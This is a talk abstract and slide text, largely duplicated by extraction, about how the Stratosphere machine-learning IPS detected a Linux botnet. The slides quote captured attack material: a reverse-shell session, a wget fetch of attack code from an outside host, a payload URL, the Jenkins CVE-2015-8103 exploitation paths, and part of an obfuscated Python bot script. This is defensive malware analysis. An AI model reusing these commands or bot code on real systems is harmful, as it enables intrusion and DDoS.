If small botnets are difficult to detect, small Linux botnets staying under the radar are more difficult. This talk describes how we detected a novel Linux botnet in a large organization by analyzing the network connections patterns with our behavioral detection system. The botnet exploits web servers and uses obfuscated python scripts to receive commands. Our behavioral IPS, called Stratosphere, was able to detect the botnet by creating machine learning models of real malware behaviors and then using those models to detect similar behaviors in other networks. From the first indicators of compromise to the final remediation, we will share our analysis, the attack methodologies observed and tools used.

1. 1
Robots againstRobots against
robots: How arobots: How a
Machine LearningMachine Learning
IDS detected aIDS detected a
novel Linux Botnetnovel Linux Botnet Sebastian GarciaSebastian Garcia
@eldracote@eldracote
sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz
https://stratosphereips.orghttps://stratosphereips.org
bit.ly/SS-RvRbit.ly/SS-RvR

2. 2
The DetectionThe Detection
January 18th, 2016.January 18th, 2016.
Testing Stratosphere IPS in the University network.Testing Stratosphere IPS in the University network.
Have an alert from a malicious behavior in the IDS.Have an alert from a malicious behavior in the IDS.
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:
88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq"For a long time there was a periodic connection (freq
5s-60s), to an uncommon port, with large flows of5s-60s), to an uncommon port, with large flows of
medium duration."medium duration."

3. 3
The Analysis: VisibilityThe Analysis: Visibility
Argus flow suite from Qosient.Argus flow suite from Qosient.
Storage of 3,000 hosts continually (1 year ~= 80GB)Storage of 3,000 hosts continually (1 year ~= 80GB)
Back in time!Back in time!

4. 4
The Detected ConnectionThe Detected Connection
Sent: "+.............P.43.249.81.135.......?."Sent: "+.............P.43.249.81.135.......?."
Recv: ".................................." (MBs)Recv: ".................................." (MBs)
Recv once: "import time as O000OO0O0O00OO00O"Recv once: "import time as O000OO0O0O00OO00O"
43.249.81.13543.249.81.135
No VirusTotal detection.No VirusTotal detection.
AS58879 Shanghai Anchang Network SecurityAS58879 Shanghai Anchang Network Security
Technology Co.,L. China.Technology Co.,L. China.
Last known domain: lyzqmir2.com. Minecraft server.Last known domain: lyzqmir2.com. Minecraft server.

5. 5
The Begining: Jan 16th, 2016The Begining: Jan 16th, 2016
103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP [VT:7][VT:7]​​
S:"/bin/sh: 0: can't access tty; job control turned off.$,"S:"/bin/sh: 0: can't access tty; job control turned off.$,"
S:"S:"tomcat6tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep
abcc.$abcc.$
S:"wget 23.247.5.27:435/abcc.c"S:"wget 23.247.5.27:435/abcc.c"
R:"ps aux |grep abcc.ccd /tmp.m"R:"ps aux |grep abcc.ccd /tmp.m"
23.247.5.2723.247.5.27 portport 435435/TCP/TCP [VT:0][VT:0]
23.247.5.2723.247.5.27 portport 2500025000/TCP (main CC)/TCP (main CC)
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64""=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

6. 6
The AnalysisThe Analysis
103.242.134.118103.242.134.118 portport 2303123031/TCP/TCP
​​""version:0.1"version:0.1"
"heartOK","hearta""heartOK","hearta"
"deployOK:115.239.248.88:80:3:60 heartOK""deployOK:115.239.248.88:80:3:60 heartOK"
103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP
"http://222.179.116.23:8080/theme/1/pys.py""http://222.179.116.23:8080/theme/1/pys.py"
Python script?Python script?

7. 7
Our computer Attacking?Our computer Attacking?
Hundreds of connections to IPs in China, port 80/UDP.Hundreds of connections to IPs in China, port 80/UDP.
115.239.248.88115.239.248.88 portport 8080//UDPUDP [MoveInternet Network[MoveInternet Network
Technology Co.,Ltd.,CN]Technology Co.,Ltd.,CN]
Few Kb ofFew Kb of binarybinary data sent.data sent.
Could not find a motive or explanation.Could not find a motive or explanation.

8. 8
The CompromiseThe Compromise
What we knewWhat we knew
Tomcat involved.Tomcat involved.
Date range.Date range.
We found strange POSTs to Jenkins minutes beforeWe found strange POSTs to Jenkins minutes before
POST /jenkins/descriptor/hudson.model.DownloadService/byId/POST /jenkins/descriptor/hudson.model.DownloadService/byId/
hudson.tasks.Maven.MavenInstaller/postBackhudson.tasks.Maven.MavenInstaller/postBack
POST /jenkins/ajaxExecutorsPOST /jenkins/ajaxExecutors
Remote Jenkins code execution vulnerabilityRemote Jenkins code execution vulnerability
. Metasploit module.. Metasploit module.
CVE-CVE-
2015-81032015-8103

9. 9
The Python Botnet ScriptThe Python Botnet Script
import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
def __init__ (O0000O0OOOOOOO0O0 ):
O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
def run (O0OO0OOOOO000O000 ):
global SvneciA
global fn023ca
global fABRVUqfh
if (fn023ca ==False ):
return
O00O0O00000OOO0OO =0
while fABRVUqfh :
O00O0O00000OOO0OO +=1
if (SvneciA >=O00O0O00000OOO0OO ):
O000OO0O0O00OO00O .sleep (1 )
else :
break
fABRVUqfh =False
try :
FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))

10. 10
The Python Botnet ScriptThe Python Botnet Script
Obfuscated. Deobfuscated by Veronica Valeros. Thx!Obfuscated. Deobfuscated by Veronica Valeros. Thx!
Threads.Threads.
C&C channel withC&C channel with 10s timeouts.10s timeouts.
​​Receives orders and executes commands, includingReceives orders and executes commands, including
access to OS.access to OS.
Confuse analysts? or DDoS?Confuse analysts? or DDoS?
Function to send random UDP data to IPs receivedFunction to send random UDP data to IPs received
by C&C.by C&C.

11. 11
How Machine LearningHow Machine Learning
detected this?detected this?

12. 12
Stratosphere IPSStratosphere IPS
https://stratosphereips.org/https://stratosphereips.org/
FreeFree
SoftwareSoftware
MachineMachine
LearningLearning
BehavioralBehavioral
IPSIPS
ProtectingProtecting
NGOsNGOs

13. 13
Stratosphere IPSStratosphere IPS
Model network behaviors as a string ofModel network behaviors as a string of lettersletters..
11 flowflow 33 featuresfeatures 11 letterletter

14. 14
Behavior of ConnectionsBehavior of Connections

15. 15
Markov Chains ModelsMarkov Chains Models
Create, train and store a Markov Chain modelsCreate, train and store a Markov Chain models

16. 16
Behavioral DetectionBehavioral Detection
TrainedTrained
Markov ModelsMarkov Models
Similarity toSimilarity to
Unknown TrafficUnknown Traffic

17. 17
ConclusionConclusion
Still unknown and hidden.Still unknown and hidden.
CouldCould notnot be detected by usual protections.be detected by usual protections.
No fingerprints, noNo fingerprints, no reputationsreputations, no rootkits., no rootkits.
ContinuousContinuous VisibilityVisibility is paramount.is paramount.
BehavioralBehavioral Machine Learning is improving.Machine Learning is improving.

18. 18
Questions? And Thanks!Questions? And Thanks!
Sebastian GarciaSebastian Garcia
sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz
@eldracote@eldracote
Workshop Malware Traffic:Workshop Malware Traffic: bit.lybit.ly/SSdirtywork/SSdirtywork